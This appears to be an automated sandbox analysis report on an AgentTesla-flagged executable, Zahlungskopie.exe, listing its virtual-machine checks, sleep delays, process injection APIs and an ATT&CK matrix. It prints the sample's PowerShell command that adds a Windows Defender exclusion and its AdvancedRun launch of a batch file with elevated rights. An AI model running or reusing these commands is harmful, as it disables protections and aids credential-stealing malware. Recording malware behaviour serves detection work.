              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\Zahlungskopie.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\Zahlungskopie.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: C:\Users\user\Desktop\Zahlungskopie.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3689
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3016
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3568
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3196
              Source: C:\Users\user\Desktop\Zahlungskopie.exe Window / User API: threadDelayed 1911
              Source: C:\Users\user\Desktop\Zahlungskopie.exe Window / User API: threadDelayed 7912
              Source: C:\Users\user\Desktop\Zahlungskopie.exe TID: 5108 Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\Zahlungskopie.exe TID: 4292 Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\Zahlungskopie.exe TID: 2204 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3120 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3788 Thread sleep time: -18446744073709540s >= -30000s
              Source: C:\Users\user\Desktop\Zahlungskopie.exe TID: 5628 Thread sleep time: -25825441703193356s >= -30000s
              Source: C:\Users\user\Desktop\Zahlungskopie.exe TID: 5684 Thread sleep count: 1911 > 30
              Source: C:\Users\user\Desktop\Zahlungskopie.exe TID: 5684 Thread sleep count: 7912 > 30
              Source: C:\Users\user\Desktop\Zahlungskopie.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: powershell.exe, 0000000B.00000003.811490211.000000000553D000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.856988920.0000000004CCA000.00000004.00000001.sdmp Binary or memory string: k:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
              Source: powershell.exe, 0000000B.00000003.811490211.000000000553D000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.856988920.0000000004CCA000.00000004.00000001.sdmp Binary or memory string: Hyper-V
              Source: Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\Zahlungskopie.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exe Code function: 0_2_015DAD90 LdrInitializeThunk,0_2_015DAD90
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe Code function: 7_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_0040289F
              Source: C:\Users\user\Desktop\Zahlungskopie.exe Process token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Users\user\Desktop\Zahlungskopie.exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion:

              Adds a directory exclusion to Windows Defender
              Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -Force
              Source: C:\Users\user\Desktop\Zahlungskopie.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -Force
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe Code function: 7_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,7_2_00401C26
              Source: C:\Users\user\Desktop\Zahlungskopie.exe Process created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\Desktop\Zahlungskopie.exe Process created: C:\Users\user\Desktop\Zahlungskopie.exe C:\Users\user\Desktop\Zahlungskopie.exe
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /SpecialRun 4101d8 6584
              Source: unknown Process created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: Zahlungskopie.exe, 00000012.00000002.915131640.00000000016E0000.00000002.00000001.sdmp Binary or memory string: Program Manager
              Source: Zahlungskopie.exe, 00000012.00000002.915131640.00000000016E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
              Source: Zahlungskopie.exe, 00000012.00000002.915131640.00000000016E0000.00000002.00000001.sdmp Binary or memory string: Progman
              Source: Zahlungskopie.exe, 00000012.00000002.915131640.00000000016E0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\Zahlungskopie.exe Queries volume information: C:\Users\user\Desktop\Zahlungskopie.exe VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Users\user\Desktop\Zahlungskopie.exe VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exe; Code function: 18_2_05ED5A94 GetUserNameW, 18_2_05ED5A94
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe; Code function: 7_2_0040A272 WriteProcessMemory, GetVersionExW, CreateRemoteThread, 7_2_0040A272
              Source: C:\Users\user\Desktop\Zahlungskopie.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              Yara detected AgentTesla
              Source: Yara match; File source: 00000012.00000002.913027538.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match; File source: 00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: Zahlungskopie.exe PID: 6448, type: MEMORY
              Source: Yara match; File source: 18.2.Zahlungskopie.exe.400000.0.unpack, type: UNPACKEDPE

              Remote Access Functionality:

              Yara detected AgentTesla
              Source: Yara match; File source: 00000012.00000002.913027538.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match; File source: 00000012.00000002.915293873.0000000002CC1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: Zahlungskopie.exe PID: 6448, type: MEMORY
              Source: Yara match; File source: 18.2.Zahlungskopie.exe.400000.0.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Windows Management Instrumentation 211 | Application Shimming 1 | Exploitation for Privilege Escalation 1 | Disable or Modify Tools 11 | OS Credential Dumping | Account Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | Native API 1 | Windows Service 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | File and Directory Discovery 1 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
